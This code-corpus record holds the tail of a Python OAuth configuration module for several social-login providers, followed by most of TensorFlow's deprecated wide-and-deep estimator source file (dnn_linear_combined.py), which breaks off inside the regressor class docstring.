CONSUMER_SECRET_FACEBOOK = Config( key="consumer_secret_facebook", help=_t("The Consumer secret of the facebook application."), type=str, default="" ) CONSUMER_SECRET_LINKEDIN = Config( key="consumer_secret_linkedin", help=_t("The Consumer secret of the linkedin application."), type=str, default="" ) REQUEST_TOKEN_URL_TWITTER = Config( key="request_token_url_twitter", help=_t("The Twitter Request token URL."), type=str, default="https://api.twitter.com/oauth/request_token" ) REQUEST_TOKEN_URL_GOOGLE = Config( key="request_token_url_google", help=_t("The Google Request token URL."), type=str, default="https://accounts.google.com/o/oauth2/auth" ) REQUEST_TOKEN_URL_FACEBOOK = Config( key="request_token_url_facebook", help=_t("The Facebook Request token URL."), type=str, default="https://graph.facebook.com/oauth/authorize" ) REQUEST_TOKEN_URL_LINKEDIN = Config( key="request_token_url_linkedin", help=_t("The Linkedin Request token URL."), type=str, default="https://www.linkedin.com/uas/oauth2/authorization" ) ACCESS_TOKEN_URL_TWITTER = Config( key="access_token_url_twitter", help=_t("The Twitter Access token URL."), type=str, default="https://api.twitter.com/oauth/access_token" ) ACCESS_TOKEN_URL_GOOGLE = Config( key="access_token_url_google", help=_t("The Google Access token URL."), type=str, default="https://accounts.google.com/o/oauth2/token" ) ACCESS_TOKEN_URL_FACEBOOK = Config( key="access_token_url_facebook", help=_t("The Facebook Access token URL."), type=str, default="https://graph.facebook.com/oauth/access_token" ) ACCESS_TOKEN_URL_LINKEDIN = Config( key="access_token_url_linkedin", help=_t("The Linkedin Access token URL."), type=str, default="https://api.linkedin.com/uas/oauth2/accessToken" ) AUTHORIZE_URL_TWITTER = 
Config( key="authenticate_url_twitter", help=_t("The Twitter Authorize URL."), type=str, default="https://api.twitter.com/oauth/authorize" ) AUTHORIZE_URL_GOOGLE = Config( key="authenticate_url_google", help=_t("The Google Authorize URL."), type=str, default="https://www.googleapis.com/oauth2/v1/userinfo" ) AUTHORIZE_URL_FACEBOOK = Config( key="authenticate_url_facebook", help=_t("The Facebook Authorize URL."), type=str, default="https://graph.facebook.com/me" ) AUTHORIZE_URL_LINKEDIN = Config( key="authenticate_url_linkedin", help=_t("The Linkedin Authorize URL."), type=str, default="https://api.linkedin.com/v1/people/~" ) WHITELISTED_DOMAINS_GOOGLE = Config( key="whitelisted_domains_google", help=_t("Comma-separated list of whitelisted domains."), type=coerce_csv, default='' ) USERNAME_MAP = Config( key="username_map", help=_t('JSON formatted hash of username simplifications. ' 'Example: {"@sub1.domain.com":"_S1", "@sub2.domain.com":"_S2"} ' 'converts "email@sub1.domain.com" to "email_S1"'), type=coerce_json_dict, default='{}' )
yanchen036/tensorflow
refs/heads/master
tensorflow/contrib/learn/python/learn/estimators/dnn_linear_combined.py
26
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """TensorFlow estimators for Linear and DNN joined training models (deprecated). This module and all its submodules are deprecated. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for migration instructions. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import math import six from tensorflow.contrib import layers from tensorflow.contrib.framework import deprecated from tensorflow.contrib.framework import deprecated_arg_values from tensorflow.contrib.layers.python.layers import feature_column as feature_column_lib from tensorflow.contrib.layers.python.layers import optimizers from tensorflow.contrib.learn.python.learn import metric_spec from tensorflow.contrib.learn.python.learn.estimators import estimator from tensorflow.contrib.learn.python.learn.estimators import head as head_lib from tensorflow.contrib.learn.python.learn.estimators import model_fn from tensorflow.contrib.learn.python.learn.estimators import prediction_key from tensorflow.contrib.learn.python.learn.utils import export from tensorflow.python.feature_column import feature_column as fc_core from tensorflow.python.framework import ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import nn from tensorflow.python.ops import partitioned_variables from tensorflow.python.ops import state_ops from tensorflow.python.ops import variable_scope from tensorflow.python.summary import summary from tensorflow.python.training import sync_replicas_optimizer from tensorflow.python.training import training_util # The default learning rates are a historical artifact of the initial # implementation, but seem a reasonable choice. _DNN_LEARNING_RATE = 0.05 _LINEAR_LEARNING_RATE = 0.2 _FIX_GLOBAL_STEP_INCREMENT_DATE = "2017-04-15" _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS = ( "Please set fix_global_step_increment_bug=True and update training steps " "in your pipeline. See pydoc for details.") def _as_iterable(preds, output): for pred in preds: yield pred[output] def _get_feature_dict(features): if isinstance(features, dict): return features return {"": features} def _get_optimizer(optimizer): if callable(optimizer): return optimizer() else: return optimizer def _check_no_sync_replicas_optimizer(optimizer): if isinstance(optimizer, sync_replicas_optimizer.SyncReplicasOptimizer): raise ValueError( "SyncReplicasOptimizer is not supported in DNNLinearCombined model. " "If you want to use this optimizer, please use either DNN or Linear " "model.") def _linear_learning_rate(num_linear_feature_columns): """Returns the default learning rate of the linear model. The calculation is a historical artifact of this initial implementation, but has proven a reasonable choice. 
Args: num_linear_feature_columns: The number of feature columns of the linear model. Returns: A float. """ default_learning_rate = 1. / math.sqrt(num_linear_feature_columns) return min(_LINEAR_LEARNING_RATE, default_learning_rate) def _add_hidden_layer_summary(value, tag): summary.scalar("%s/fraction_of_zero_values" % tag, nn.zero_fraction(value)) summary.histogram("%s/activation" % tag, value) def _add_layer_summary(value, tag): summary.scalar("%s/fraction_of_zero_values" % tag, nn.zero_fraction(value)) summary.histogram("%s/activation" % tag, value) def _get_embedding_variable(column, collection_key, input_layer_scope): return ops.get_collection(collection_key, input_layer_scope + "/" + column.name) def _extract_embedding_lr_multipliers(embedding_lr_multipliers, collection_key, input_layer_scope): """Converts embedding lr multipliers to variable based gradient multiplier.""" if not embedding_lr_multipliers: return None gradient_multipliers = {} for column, lr_mult in embedding_lr_multipliers.items(): if not isinstance(column, feature_column_lib._EmbeddingColumn): # pylint: disable=protected-access raise ValueError( "learning rate multipler can only be defined for embedding columns. " "It is defined for {}".format(column)) embedding = _get_embedding_variable( column, collection_key, input_layer_scope) if not embedding: raise ValueError("Couldn't find a variable for column {}".format(column)) for v in embedding: gradient_multipliers[v] = lr_mult return gradient_multipliers def _dnn_linear_combined_model_fn(features, labels, mode, params, config=None): """Deep Neural Net and Linear combined model_fn. Args: features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`). labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of dtype `int32` or `int64` in the range `[0, n_classes)`. mode: Defines whether this is training, evaluation or prediction. See `ModeKeys`. params: A dict of hyperparameters. The following hyperparameters are expected: * head: A `Head` instance. * linear_feature_columns: An iterable containing all the feature columns used by the Linear model. * linear_optimizer: string, `Optimizer` object, or callable that defines the optimizer to use for training the Linear model. Defaults to the Ftrl optimizer. * joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires all columns are sparse and have the 'sum' combiner. * dnn_feature_columns: An iterable containing all the feature columns used by the DNN model. * dnn_optimizer: string, `Optimizer` object, or callable that defines the optimizer to use for training the DNN model. Defaults to the Adagrad optimizer. * dnn_hidden_units: List of hidden units per DNN layer. * dnn_activation_fn: Activation function applied to each DNN layer. If `None`, will use `tf.nn.relu`. * dnn_dropout: When not `None`, the probability we will drop out a given DNN coordinate. * gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. * embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. * input_layer_partitioner: Optional. Partitioner for input layer. config: `RunConfig` object to configure the runtime settings. 
Returns: `ModelFnOps` Raises: ValueError: If both `linear_feature_columns` and `dnn_features_columns` are empty at the same time, or `input_layer_partitioner` is missing. """ head = params["head"] linear_feature_columns = params.get("linear_feature_columns") linear_optimizer = params.get("linear_optimizer") or "Ftrl" joint_linear_weights = params.get("joint_linear_weights") dnn_feature_columns = params.get("dnn_feature_columns") dnn_optimizer = params.get("dnn_optimizer") or "Adagrad" dnn_hidden_units = params.get("dnn_hidden_units") dnn_activation_fn = params.get("dnn_activation_fn") or nn.relu dnn_dropout = params.get("dnn_dropout") gradient_clip_norm = params.get("gradient_clip_norm") num_ps_replicas = config.num_ps_replicas if config else 0 input_layer_partitioner = params.get("input_layer_partitioner") or ( partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas, min_slice_size=64 << 20)) embedding_lr_multipliers = params.get("embedding_lr_multipliers", {}) fix_global_step_increment_bug = params.get( "fix_global_step_increment_bug", True) if not linear_feature_columns and not dnn_feature_columns: raise ValueError( "Either linear_feature_columns or dnn_feature_columns must be defined.") features = _get_feature_dict(features) linear_optimizer = _get_optimizer(linear_optimizer) _check_no_sync_replicas_optimizer(linear_optimizer) dnn_optimizer = _get_optimizer(dnn_optimizer) _check_no_sync_replicas_optimizer(dnn_optimizer) # Build DNN Logits. dnn_parent_scope = "dnn" if not dnn_feature_columns: dnn_logits = None else: if not dnn_hidden_units: raise ValueError( "dnn_hidden_units must be defined when dnn_feature_columns is " "specified.") dnn_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas)) with variable_scope.variable_scope( dnn_parent_scope, values=tuple(six.itervalues(features)), partitioner=dnn_partitioner): with variable_scope.variable_scope( "input_from_feature_columns", values=tuple(six.itervalues(features)), partitioner=input_layer_partitioner) as dnn_input_scope: if all([ isinstance(fc, feature_column_lib._FeatureColumn) # pylint: disable=protected-access for fc in dnn_feature_columns ]): net = layers.input_from_feature_columns( columns_to_tensors=features, feature_columns=dnn_feature_columns, weight_collections=[dnn_parent_scope], scope=dnn_input_scope) else: net = fc_core.input_layer( features=features, feature_columns=dnn_feature_columns, weight_collections=[dnn_parent_scope]) for layer_id, num_hidden_units in enumerate(dnn_hidden_units): with variable_scope.variable_scope( "hiddenlayer_%d" % layer_id, values=(net,)) as dnn_hidden_layer_scope: net = layers.fully_connected( net, num_hidden_units, activation_fn=dnn_activation_fn, variables_collections=[dnn_parent_scope], scope=dnn_hidden_layer_scope) if dnn_dropout is not None and mode == model_fn.ModeKeys.TRAIN: net = layers.dropout( net, keep_prob=(1.0 - dnn_dropout)) # TODO(b/31209633): Consider adding summary before dropout. _add_layer_summary(net, dnn_hidden_layer_scope.name) with variable_scope.variable_scope( "logits", values=(net,)) as dnn_logits_scope: dnn_logits = layers.fully_connected( net, head.logits_dimension, activation_fn=None, variables_collections=[dnn_parent_scope], scope=dnn_logits_scope) _add_layer_summary(dnn_logits, dnn_logits_scope.name) # Build Linear logits. 
linear_parent_scope = "linear" if not linear_feature_columns: linear_logits = None else: linear_partitioner = partitioned_variables.min_max_variable_partitioner( max_partitions=num_ps_replicas, min_slice_size=64 << 20) with variable_scope.variable_scope( linear_parent_scope, values=tuple(six.itervalues(features)), partitioner=linear_partitioner) as scope: if all([isinstance(fc, feature_column_lib._FeatureColumn) # pylint: disable=protected-access for fc in linear_feature_columns]): if joint_linear_weights: linear_logits, _, _ = layers.joint_weighted_sum_from_feature_columns( columns_to_tensors=features, feature_columns=linear_feature_columns, num_outputs=head.logits_dimension, weight_collections=[linear_parent_scope], scope=scope) else: linear_logits, _, _ = layers.weighted_sum_from_feature_columns( columns_to_tensors=features, feature_columns=linear_feature_columns, num_outputs=head.logits_dimension, weight_collections=[linear_parent_scope], scope=scope) else: linear_logits = fc_core.linear_model( features=features, feature_columns=linear_feature_columns, units=head.logits_dimension, weight_collections=[linear_parent_scope]) _add_layer_summary(linear_logits, scope.name) # Combine logits and build full model. if dnn_logits is not None and linear_logits is not None: logits = dnn_logits + linear_logits elif dnn_logits is not None: logits = dnn_logits else: logits = linear_logits def _make_training_op(training_loss): """Training op for the DNN linear combined model.""" train_ops = [] global_step = training_util.get_global_step() if dnn_logits is not None: train_ops.append( optimizers.optimize_loss( loss=training_loss, global_step=global_step, learning_rate=_DNN_LEARNING_RATE, optimizer=dnn_optimizer, gradient_multipliers=_extract_embedding_lr_multipliers( # pylint: disable=protected-access embedding_lr_multipliers, dnn_parent_scope, dnn_input_scope.name), clip_gradients=gradient_clip_norm, variables=ops.get_collection(dnn_parent_scope), name=dnn_parent_scope, # Empty summaries, because head already logs "loss" summary. summaries=[], increment_global_step=not fix_global_step_increment_bug)) if linear_logits is not None: train_ops.append( optimizers.optimize_loss( loss=training_loss, global_step=global_step, learning_rate=_linear_learning_rate(len(linear_feature_columns)), optimizer=linear_optimizer, clip_gradients=gradient_clip_norm, variables=ops.get_collection(linear_parent_scope), name=linear_parent_scope, # Empty summaries, because head already logs "loss" summary. summaries=[], increment_global_step=not fix_global_step_increment_bug)) train_op = control_flow_ops.group(*train_ops) if fix_global_step_increment_bug: with ops.control_dependencies([train_op]): with ops.colocate_with(global_step): return state_ops.assign_add(global_step, 1).op return train_op return head.create_model_fn_ops( features=features, mode=mode, labels=labels, train_op_fn=_make_training_op, logits=logits) class DNNLinearCombinedEstimator(estimator.Estimator): """An estimator for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Input of `fit`, `train`, and `evaluate` should have following features, otherwise there will be a `KeyError`: if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. 
for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. """ @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name head, model_dir=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=None, dnn_dropout=None, gradient_clip_norm=None, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, fix_global_step_increment_bug=False, input_layer_partitioner=None): """Initializes a DNNLinearCombinedEstimator instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: head: A _Head object. model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set should be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True will use a single (possibly partitioned) variable to store all weights for the linear model. More efficient if there are many columns, however requires all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set should be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If `None`, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. New users must set this to `True`, but the default value is `False` for backwards compatibility. input_layer_partitioner: Optional. Partitioner for input layer. 
Raises: ValueError: If both linear_feature_columns and dnn_features_columns are empty at the same time. """ linear_feature_columns = tuple(linear_feature_columns or []) dnn_feature_columns = tuple(dnn_feature_columns or []) if not linear_feature_columns + dnn_feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") super(DNNLinearCombinedEstimator, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "fix_global_step_increment_bug": fix_global_step_increment_bug, "input_layer_partitioner": input_layer_partitioner }, feature_engineering_fn=feature_engineering_fn) class DNNLinearCombinedClassifier(estimator.Estimator): """A classifier for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Example: ```python sparse_feature_a = sparse_column_with_hash_bucket(...) sparse_feature_b = sparse_column_with_hash_bucket(...) sparse_feature_a_x_sparse_feature_b = crossed_column(...) sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a, ...) sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b, ...) estimator = DNNLinearCombinedClassifier( # common settings n_classes=n_classes, weight_column_name=weight_column_name, # wide settings linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], linear_optimizer=tf.train.FtrlOptimizer(...), # deep settings dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], dnn_optimizer=tf.train.AdagradOptimizer(...)) # Input builders def input_fn_train: # returns x, y (where y represents label's class index). ... def input_fn_eval: # returns x, y (where y represents label's class index). ... def input_fn_predict: # returns x, None. ... estimator.fit(input_fn=input_fn_train) estimator.evaluate(input_fn=input_fn_eval) # predict_classes returns class indices. estimator.predict_classes(input_fn=input_fn_predict) ``` If the user specifies `label_keys` in constructor, labels must be strings from the `label_keys` vocabulary. Example: ```python label_keys = ['label0', 'label1', 'label2'] estimator = DNNLinearCombinedClassifier( n_classes=n_classes, linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], label_keys=label_keys) def input_fn_train: # returns x, y (where y is one of label_keys). pass estimator.fit(input_fn=input_fn_train) def input_fn_eval: # returns x, y (where y is one of label_keys). pass estimator.evaluate(input_fn=input_fn_eval) def input_fn_predict: # returns x, None # predict_classes returns one of label_keys. 
estimator.predict_classes(input_fn=input_fn_predict) ``` Input of `fit` and `evaluate` should have following features, otherwise there will be a `KeyError`: * if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. * for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. """ @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name model_dir=None, n_classes=2, weight_column_name=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=nn.relu, dnn_dropout=None, gradient_clip_norm=None, enable_centered_bias=False, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, input_layer_min_slice_size=None, label_keys=None, fix_global_step_increment_bug=False): """Constructs a DNNLinearCombinedClassifier instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. n_classes: number of label classes. Default is binary classification. Note that class labels are integers representing the class index (i.e. values from 0 to n_classes-1). For arbitrary label values (e.g. string labels), convert to class indices first. weight_column_name: A string defining feature column name representing weights. It is used to down weight or boost examples during training. It will be multiplied by the loss of the example. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If `None`, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. enable_centered_bias: A bool. 
If True, estimator will learn a centered bias variable for each class. Rest of the model structure learns the residual after centered bias. config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. input_layer_min_slice_size: Optional. The min slice size of input layer partitions. If not provided, will use the default of 64M. label_keys: Optional list of strings with size `[n_classes]` defining the label vocabulary. Only supported for `n_classes` > 2. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. New users must set this to `True`, but it the default value is `False` for backwards compatibility. Raises: ValueError: If `n_classes` < 2. ValueError: If both `linear_feature_columns` and `dnn_features_columns` are empty at the same time. """ head = head_lib.multi_class_head( n_classes=n_classes, weight_column_name=weight_column_name, enable_centered_bias=enable_centered_bias, label_keys=label_keys) linear_feature_columns = tuple(linear_feature_columns or []) dnn_feature_columns = tuple(dnn_feature_columns or []) self._feature_columns = linear_feature_columns + dnn_feature_columns if not self._feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") # TODO(b/35922130): Replace with `input_layer_partitioner` arg. input_layer_partitioner = None if input_layer_min_slice_size is not None: input_layer_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=config.num_ps_replicas if config else 0, min_slice_size=input_layer_min_slice_size)) super(DNNLinearCombinedClassifier, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "input_layer_partitioner": input_layer_partitioner, "fix_global_step_increment_bug": fix_global_step_increment_bug, }, feature_engineering_fn=feature_engineering_fn) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) @deprecated_arg_values( "2017-03-01", "Please switch to predict_classes, or set `outputs` argument.", outputs=None) def predict(self, x=None, input_fn=None, batch_size=None, outputs=None, as_iterable=True): """Returns predictions for given features. By default, returns predicted classes. But this default will be dropped soon. Users should either pass `outputs`, or call `predict_classes` method. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. outputs: list of `str`, name of the output to predict. If `None`, returns classes. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. 
Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted classes with shape [batch_size] (or an iterable of predicted classes if as_iterable is True). Each predicted class is represented by its class index (i.e. integer from 0 to n_classes-1). If `outputs` is set, returns a dict of predictions. """ if not outputs: return self.predict_classes( x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable) return super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=outputs, as_iterable=as_iterable) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_classes(self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns predicted classes for given features. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted classes with shape [batch_size] (or an iterable of predicted classes if as_iterable is True). Each predicted class is represented by its class index (i.e. integer from 0 to n_classes-1). """ key = prediction_key.PredictionKey.CLASSES preds = super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return _as_iterable(preds, output=key) return preds[key].reshape(-1) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_proba( self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns prediction probabilities for given features. Args: x: features. input_fn: Input function. If set, x and y must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted probabilities with shape [batch_size, n_classes] (or an iterable of predicted probabilities if as_iterable is True). 
""" key = prediction_key.PredictionKey.PROBABILITIES preds = super(DNNLinearCombinedClassifier, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return _as_iterable(preds, output=key) return preds[key] @deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.") def export(self, export_dir, input_fn=None, input_feature_key=None, use_deprecated_input_fn=True, signature_fn=None, default_batch_size=1, exports_to_keep=None): """See BasEstimator.export.""" def default_input_fn(unused_estimator, examples): return layers.parse_feature_columns_from_examples( examples, self._feature_columns) return super(DNNLinearCombinedClassifier, self).export( export_dir=export_dir, input_fn=input_fn or default_input_fn, input_feature_key=input_feature_key, use_deprecated_input_fn=use_deprecated_input_fn, signature_fn=(signature_fn or export.classification_signature_fn_with_prob), prediction_key=prediction_key.PredictionKey.PROBABILITIES, default_batch_size=default_batch_size, exports_to_keep=exports_to_keep) class DNNLinearCombinedRegressor(estimator.Estimator): """A regressor for TensorFlow Linear and DNN joined training models. THIS CLASS IS DEPRECATED. See [contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md) for general migration instructions. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Example: ```python sparse_feature_a = sparse_column_with_hash_bucket(...) sparse_feature_b = sparse_column_with_hash_bucket(...) sparse_feature_a_x_sparse_feature_b = crossed_column(...) sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a, ...) sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b, ...) estimator = DNNLinearCombinedRegressor( # common settings weight_column_name=weight_column_name, # wide settings linear_feature_columns=[sparse_feature_a_x_sparse_feature_b], linear_optimizer=tf.train.FtrlOptimizer(...), # deep settings dnn_feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb], dnn_hidden_units=[1000, 500, 100], dnn_optimizer=tf.train.ProximalAdagradOptimizer(...)) # To apply L1 and L2 regularization, you can set optimizers as follows: tf.train.ProximalAdagradOptimizer( learning_rate=0.1, l1_regularization_strength=0.001, l2_regularization_strength=0.001) # It is same for FtrlOptimizer. # Input builders def input_fn_train: # returns x, y ... def input_fn_eval: # returns x, y ... def input_fn_predict: # returns x, None ... estimator.train(input_fn_train) estimator.evaluate(input_fn_eval) estimator.predict(input_fn_predict) ``` Input of `fit`, `train`, and `evaluate` should have following features, otherwise there will be a `KeyError`: if `weight_column_name` is not `None`, a feature with `key=weight_column_name` whose value is a `Tensor`. for each `column` in `dnn_feature_columns` + `linear_feature_columns`: - if `column` is a `SparseColumn`, a feature with `key=column.name` whose `value` is a `SparseTensor`. - if `column` is a `WeightedSparseColumn`, two features: the first with `key` the id column name, the second with `key` the weight column name. Both features' `value` must be a `SparseTensor`. - if `column` is a `RealValuedColumn, a feature with `key=column.name` whose `value` is a `Tensor`. 
